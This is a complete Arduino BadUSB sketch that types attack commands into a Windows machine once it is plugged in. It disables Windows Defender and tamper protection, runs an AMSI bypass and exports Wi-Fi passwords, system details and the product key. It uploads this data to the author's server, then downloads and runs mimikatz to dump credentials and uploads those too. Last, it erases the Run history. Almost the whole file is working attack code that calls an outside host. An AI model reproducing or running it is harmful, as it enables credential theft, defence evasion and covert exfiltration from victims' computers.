/* badusb.ino * Author: Dominic Reich (OE7DRT), dominic@oe7drt.com * Created November 25th, 2023 * Last modified: 2024-12-24T08:58:01+0100 on Arch [Odin] X1 * * Waits 15 seconds after plugged in, then it starts to remove antivirus * definitions of Windows Defender and disables monitoring. Right after it * disables Anti-Tampering in the Windows-Security GUI. * The script collects some useful information about the computer, its * network and the currently active routes as well as listening ports and * its processes. It also saves (if possible) the product key as well as * saved WiFi networks. Finally it launches mimikatz and dumps windows * secrets and uploads everything to my webserver via HTTP POST. * It then removes the run history (Win+R) and closes the terminal window. * * Based on the examples from * https://www.instructables.com/A-BadUSB-Device-With-Arduino/ * * Following times are outdated as I added some commands which take * a few seconds of time: * Time until I have everything on my server: ~42 sec * Time until script finished locally: ~49 sec * Time until execution starts (waiting time): 15 sec */ #include #define KEY_DELAY 50 //delay between keystrokes for slow computers void disableTampering() { // Disable tamper protection with the Windows GUI on Windows 10 // Tested on my Lenovo T420 running Windows 10 {VERSION} Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r'); delay(KEY_DELAY); Keyboard.releaseAll(); delay(700); Keyboard.println("windowsdefender:"); delay(3000); // maximize window because on small screens the focus of the button changes Keyboard.press(KEY_LEFT_ALT); Keyboard.press(' '); delay(KEY_DELAY); Keyboard.releaseAll(); delay(200); Keyboard.press('x'); delay(KEY_DELAY); Keyboard.release('x'); delay(400); // Viren- und Bedrohungsschutz Keyboard.press(KEY_RETURN); delay(KEY_DELAY); Keyboard.release(KEY_RETURN); delay(1400); // move down to Einstellungen verwalten Keyboard.press(KEY_TAB); delay(KEY_RETURN); Keyboard.release(KEY_TAB); delay(KEY_DELAY); Keyboard.press(KEY_TAB); delay(KEY_RETURN); Keyboard.release(KEY_TAB); delay(KEY_DELAY); Keyboard.press(KEY_TAB); delay(KEY_RETURN); Keyboard.release(KEY_TAB); delay(KEY_DELAY); Keyboard.press(KEY_TAB); delay(KEY_RETURN); Keyboard.release(KEY_TAB); delay(KEY_DELAY); Keyboard.press(KEY_RETURN); delay(KEY_DELAY); Keyboard.release(KEY_RETURN); delay(1400); // Disable Echtzeitschutz Keyboard.press(' '); delay(KEY_DELAY); Keyboard.release(' '); delay(KEY_DELAY); // yes do it with ALT+j Keyboard.press(KEY_LEFT_ALT); Keyboard.press('j'); delay(KEY_DELAY); Keyboard.releaseAll(); delay(1200); // move down to Cloudbasierter Schutz slider Keyboard.press(KEY_TAB); delay(KEY_RETURN); Keyboard.release(KEY_TAB); delay(KEY_DELAY); Keyboard.press(KEY_TAB); delay(KEY_RETURN); Keyboard.release(KEY_TAB); delay(KEY_DELAY); Keyboard.press(KEY_TAB); delay(KEY_RETURN); Keyboard.release(KEY_TAB); delay(KEY_DELAY); Keyboard.press(' '); delay(KEY_DELAY); Keyboard.release(' '); delay(1400); // go ahead and disable Automatische Übermittlung von Beispielen Keyboard.press(KEY_TAB); delay(KEY_RETURN); Keyboard.release(KEY_TAB); delay(KEY_DELAY); Keyboard.press(' '); delay(KEY_DELAY); Keyboard.release(' '); delay(1400); // disable Manipulationsschutz Keyboard.press(KEY_TAB); delay(KEY_RETURN); Keyboard.release(KEY_TAB); delay(KEY_DELAY); Keyboard.press(KEY_TAB); delay(KEY_RETURN); Keyboard.release(KEY_TAB); delay(KEY_DELAY); Keyboard.press(' '); delay(KEY_DELAY); Keyboard.release(' '); delay(1400); // close window with alt f4 Keyboard.press(KEY_LEFT_ALT); Keyboard.press(KEY_F4); delay(KEY_DELAY); Keyboard.releaseAll(); delay(700); } void setup() { // Keyboard.begin(); Keyboard.begin(KeyboardLayout_de_DE); //I recommend that you leave a short delay before start while prototyping. //It will will give you some time to reprogram a board before it starts typing. delay(15000); // normal program, only run it once at startup disableTampering(); // Windows + R Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r'); delay(KEY_DELAY); Keyboard.releaseAll(); delay(900); // Start cmd as Administrator Keyboard.println("powershell Start-Process cmd -Verb runAs"); delay(4600); // press ALT + j to confirm execution as Administrator Keyboard.press(KEY_LEFT_ALT); Keyboard.press('j'); delay(KEY_DELAY); Keyboard.releaseAll(); delay(1700); // If no UAC enabled, we printed j on the console, let's // initiate a few CTRL+C's to cancel that and get a fresh // prompt... Keyboard.press(KEY_LEFT_CTRL); Keyboard.press('c'); delay(KEY_DELAY); Keyboard.releaseAll(); delay(100); Keyboard.press(KEY_LEFT_CTRL); Keyboard.press('c'); delay(KEY_DELAY); Keyboard.releaseAll(); delay(100); // Disable Defender; wait a bit longer, because recent only `ershell ...` was printed Keyboard.println("\"C:\\program files\\windows defender\\mpcmdrun.exe\" -RemoveDefinitions -All Set-MpPreference -DisableOAVProtection $true"); delay(400); // Start powershell; wait longer because the OS has to bring another window to foreground Keyboard.println("powershell"); delay(2600); // Add C: to Defender exclusion list Keyboard.println("Add-MpPreference -ExclusionPath \"C:\\\""); delay(400); Keyboard.println("\"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'.'NonPublic,Static').SetValue($null,$true)\""); delay(400); // get some information about the network Keyboard.println("cd $ENV:UserProfile"); delay(400); Keyboard.println("New-Item -Name \"tmp\" -Type Directory -Force"); delay(100); Keyboard.println("cd tmp"); delay(100); Keyboard.println("netsh wlan export profile key=clear"); delay(400); Keyboard.println("ipconfig /all > ipc.txt"); delay(400); Keyboard.println("netstat -rn > nr.txt"); delay(400); Keyboard.println("netstat -anb >> nr.txt"); delay(400); Keyboard.println("systeminfo > pc.txt"); delay(4600); Keyboard.println("Get-ComputerInfo > pspc.txt"); delay(4600); Keyboard.println("Reg export \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform\" prodkey.txt /y"); delay(400); // ftp connection (windows ftp does not know about passive ftp) // Keyboard.println("ftp"); // delay(200); // Keyboard.println("open bor.oe7drt.com"); // delay(400); // Keyboard.println("mimiwauz"); // delay(400); // Keyboard.println("harschbichl"); // delay(400); // Keyboard.println("prompt"); // delay(400); // Keyboard.println("mput *.*"); // delay(400); // Keyboard.println("quit"); // delay(400); // Keyboard.println("((sc -NoNewLine -Encoding Ascii .\\Report.txt -Value(gc *.*) -join """`n""") + """`n""")"); // delay(KEY_DELAY); // Keyboard.println("$report=gc .\\Report.txt"); Keyboard.println("$report=gc -Encoding utf8 -Delimiter \"'n\" *.*"); delay(400); Keyboard.println("(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/rx-net.php',$report)"); delay(2200); Keyboard.println("cd .."); delay(400); Keyboard.println("Remove-Item -Recurse -Force tmp"); delay(400); // exit powershell (because the next commands have to run in a separated powershell process) Keyboard.println("exit"); delay(2200); // Download and execute mimikatz; then upload result log Keyboard.println("powershell \"IEX (New-Object Net.WebClient).DownloadString('http://bor.oe7drt.com/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/imrx.php',$output)\""); // Keyboard.println("IEX (New-Object Net.WebClient).DownloadString('http://bor.oe7drt.com/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/imrx.php',$output)"); delay(9000); // Clear run history Keyboard.println("powershell \"Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue\""); // Keyboard.println("Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue"); delay(400); // show wlan passwords // Keyboard.println("netsh wlan show profile key=clear"); // delay(8000); // exit cmd window Keyboard.println("exit"); delay(KEY_DELAY); Keyboard.end(); } void loop() { // do nothing in loop() -- or should we restart the computer? or lock it? or delete something? // or start a fork bomb etc... }